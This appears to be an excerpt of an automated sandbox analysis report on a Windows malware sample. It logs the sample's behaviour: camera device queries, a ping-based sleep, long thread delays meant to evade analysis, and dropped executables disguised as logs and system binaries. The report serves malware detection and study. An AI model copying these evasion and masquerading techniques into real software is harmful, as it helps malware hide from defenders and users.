                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Uses ping.exe to sleep
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeMemory allocated: DC0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeMemory allocated: 1A740000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeMemory allocated: 1560000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeMemory allocated: 1B150000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeMemory allocated: 1560000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeMemory allocated: 1AF80000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeMemory allocated: 1540000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeMemory allocated: 1B320000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeMemory allocated: 920000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeMemory allocated: 1A4C0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeMemory allocated: F30000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeMemory allocated: 1AD90000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeMemory allocated: A90000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeMemory allocated: 1A610000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeMemory allocated: 2C40000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeMemory allocated: 1AE60000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeMemory allocated: 16D0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeMemory allocated: 1B260000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeMemory allocated: 2830000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeMemory allocated: 1AAB0000 memory reserve | memory write watch
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeMemory allocated: D20000 memory reserve | memory write watch
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeMemory allocated: 1A760000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 600000
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 599863
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 599703
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 3600000
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 598781
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 598516
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 598323
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 598104
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 597906
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 597672
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 597391
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 597000
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 595797
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 595500
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 595110
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 594688
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 594328
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 593781
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 592797
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 592235
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 591860
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 591094
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 590485
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 589797
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 589391
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 588953
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 588500
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 588063
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 586563
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 586188
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 585688
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 585203
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 584797
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 584401
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 583203
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 582656
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 582281
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 581688
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 581360
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 581151
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 580719
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 580203
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 579999
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 579781
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 579641
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 579485
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 579281
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 579135
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 579024
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 578897
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 578735
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 578608
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 578500
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 578382
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 578248
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 578063
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 577500
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 577203
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 576984
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 576823
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 576656
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 576433
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 576173
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 575921
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 575792
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 575672
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 575485
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 300000
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 575340
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 574827
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 574680
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 574563
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 574438
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 574313
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 574185
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 574016
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 573885
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 573757
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 573625
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 573438
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 573287
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 573125
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 572954
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 572781
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 572664
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 572078
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 571927
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 571735
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 571593
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 571453
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 571266
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 571094
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 570922
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 570750
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 570624
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 570500
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 570391
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 570265
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 570106
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 569970
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 569272
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 569022
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 568875
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 568758
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 568594
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 568444
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 568297
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 568147
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 567983
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 567846
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 567625
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 567406
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 567156
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 566813
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 566188
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 565953
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 565735
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 565590
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 565451
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 565311
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 565166
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 565042
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 564922
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 564769
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 564531
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 564384
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 564235
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 563699
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 563571
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 563391
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 563252
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 563079
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 562953
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 562799
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 562662
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 562544
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 562375
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3765
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2384
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2111
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4531
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3573
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3123
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWindow / User API: threadDelayed 8819
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeDropped PE file which has not been started: C:\Users\user\Desktop\DHvXeCGn.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeDropped PE file which has not been started: C:\Users\user\Desktop\maoHSLGQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeDropped PE file which has not been started: C:\Users\user\Desktop\XMmLkVMA.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeDropped PE file which has not been started: C:\Users\user\Desktop\cflUKPKy.logJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeDropped PE file which has not been started: C:\Users\user\Desktop\EnQNlhbf.logJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeDropped PE file which has not been started: C:\Users\user\Desktop\wJHXBnLy.logJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeDropped PE file which has not been started: C:\Users\user\Desktop\BQKoNvFu.logJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeDropped PE file which has not been started: C:\Users\user\Desktop\SxREamFR.logJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeDropped PE file which has not been started: C:\Users\user\Desktop\MvRfNUhf.logJump to dropped file
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeDropped PE file which has not been started: C:\Users\user\Desktop\HJnNqbKj.logJump to dropped file
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exe TID: 7128Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe TID: 7124Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe TID: 7940Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exe TID: 7868Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 8080Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 8188Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep count: 3765 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep count: 2384 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 2111 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep count: 4531 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep count: 3573 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep count: 3123 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exe TID: 8176Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exe TID: 7624Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 6388Thread sleep time: -30000s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -18446744073709540s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -600000s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -599863s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -599703s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 1576Thread sleep time: -46800000s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -598781s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 2072Thread sleep time: -35000s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -598516s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -598323s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -598104s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -597906s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -597672s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -597391s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -597000s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -595797s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -595500s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -595110s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -594688s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -594328s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -593781s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -592797s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -592235s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -591860s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -591094s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -590485s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -589797s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -589391s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -588953s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -588500s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -588063s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -586563s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -586188s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -585688s >= -30000s
